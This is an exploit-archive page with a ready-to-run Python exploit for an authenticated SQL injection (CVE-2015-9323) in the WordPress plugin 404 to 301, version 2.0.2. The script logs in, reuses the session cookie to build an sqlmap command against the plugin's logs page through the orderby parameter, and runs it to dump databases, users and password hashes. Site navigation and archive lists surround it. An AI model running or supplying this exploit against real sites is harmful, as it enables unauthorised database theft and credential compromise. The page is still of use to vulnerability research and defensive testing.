WordPress 404 To 301 2.0.2 SQL Injection

WordPress 404 To 301 2.0.2 SQL Injection: Posted Feb 2, 2022; Authored by Ron Jost; WordPress 404 to 301 plugin version 2.l0.2 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2015-9323; SHA-256 | 560479e379eb19da8b9dcced3bcc9ff7be02be670bdce171a13c96832f6f6f7f; Download | Favorite | View

WordPress 404 To 301 2.0.2 SQL Injection

# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
# Date 30.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/
# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip
# Version: <= 2.0.2
# Tested on: Ubuntu 20.04
# CVE: CVE-2015-9323
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md

'''
Description:
The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.
'''

banner = '''       
                                             
 .o88b. db    db d88888b        .d888b.  .d88b.   db   ooooo        .d888b. d8888b. .d888b. d8888b. 
d8P  Y8 88    88 88'            VP  `8D .8P  88. o88  8P~~~~        88' `8D VP  `8D VP  `8D VP  `8D 
8P      Y8    8P 88ooooo           odD' 88  d'88  88 dP             `V8o88'   oooY'    odD'   oooY' 
8b      `8b  d8' 88~~~~~ C8888D  .88'   88 d' 88  88 V8888b. C8888D    d8'    ~~~b.  .88'     ~~~b. 
Y8b  d8  `8bd8'  88.            j88.    `88  d8'  88     `8D          d8'   db   8D j88.    db   8D 
 `Y88P'    YP    Y88888P        888888D  `Y88P'   VP 88oobY'         d8'    Y8888P' 888888D Y8888P' 
  
                                                            [+] 404 to 301 - SQL-Injection 
                                                            [@] Developed by Ron Jost (Hacker5preme)
                                                        
'''
print(banner)

import argparse
import os
import requests
from datetime import datetime
import json

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))


# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):

# Generate payload for sqlmap
print ('[+] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')

exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'
exploit_risk = ' --level 2 --risk 2'
exploit_cookie = r' --cookie="' + cookie + r'" '

print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'
os.system(exploit_code)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

Top Authors In Last 30 Days

Red Hat 310 files
Ubuntu 81 files
Debian 19 files
Ahmet Umit Bayram 8 files
tmrswrr 4 files
Furkan Eren Tetik 4 files
Google Security Research 4 files
Jann Horn 4 files
Amit Roy 4 files
h00die 3 files

File Archives

Systems

AIX (429)
Apple (2,089)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,057)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,500)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,005)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (16,061)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,574)
UNIX (9,417)
UnixWare (187)
Windows (6,662)
Other

WordPress 404 To 301 2.0.2 SQL Injection

WordPress 404 To 301 2.0.2 SQL Injection

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress 404 To 301 2.0.2 SQL Injection

Share This

WordPress 404 To 301 2.0.2 SQL Injection

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems